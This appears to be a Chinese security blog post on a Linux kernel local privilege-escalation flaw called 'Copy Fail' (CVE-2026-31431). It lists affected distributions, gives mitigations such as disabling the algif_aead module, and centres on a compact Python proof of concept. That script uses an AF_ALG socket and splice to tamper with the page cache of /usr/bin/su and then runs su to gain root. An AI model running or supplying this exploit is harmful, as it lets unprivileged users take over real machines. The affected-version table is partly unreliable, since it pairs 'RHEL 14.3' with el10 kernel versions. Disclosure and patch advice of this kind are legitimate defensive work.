先关注,不迷路.
免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
漏洞介绍
近日,Theori / Xint Code 公开披露了一个 Linux 内核漏洞:Copy Fail,CVE-2026-31431。根据 Xint 的报告,这个漏洞影响面非常广,涉及 Ubuntu、Amazon Linux、RHEL、SUSE 等主流 Linux 发行版。它的危险点不在于攻击链复杂,而恰恰相反:攻击者只需要本地普通用户权限,就可能通过极短的脚本获得 root 权限。更值得注意的是,它不是传统意义上的文件写入漏洞,而是一次对 Linux page cache 页面缓存 的“内存级篡改”。
影响范围
| Ubuntu 24.04 LTS | 6.17.0-1007-aws |
|---|
| Amazon Linux 2023 | 6.18.8-9.213.amzn2023 |
| RHEL 14.3 | 6.12.0-124.45.1.el10_1 |
| SUSE 16 | 6.12.0-160000.9-默认 |
| 部分信创系统 | |
漏洞复现
POC:
(这微信页面直接复制代码格式会乱,可以浏览器打开复制)
#!/usr/bin/env python3import os as g,zlib,socket as sdef d(x):return bytes.fromhex(x)def c(f,t,c): a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o) try:u.recv(8+t) except:0f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))while i<len(e):c(f,i,e[i:i+4]);i+=4g.system("su")

修复意见
推荐处理
最稳妥方式是:
升级发行版内核补丁
重点关注发行版安全公告和云厂商内核更新。
临时缓解
如果业务不依赖 AF_ALG AEAD,可以考虑限制相关攻击面,例如:
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.confrmmod algif_aead 2>/dev/null
也可以在容器环境中通过 seccomp 限制不必要的 AF_ALG socket 创建能力。
需要注意的是,缓解措施要结合业务场景测试,避免影响合法加密功能。
参考
https://xint.io/blog/copy-fail-linux-distributions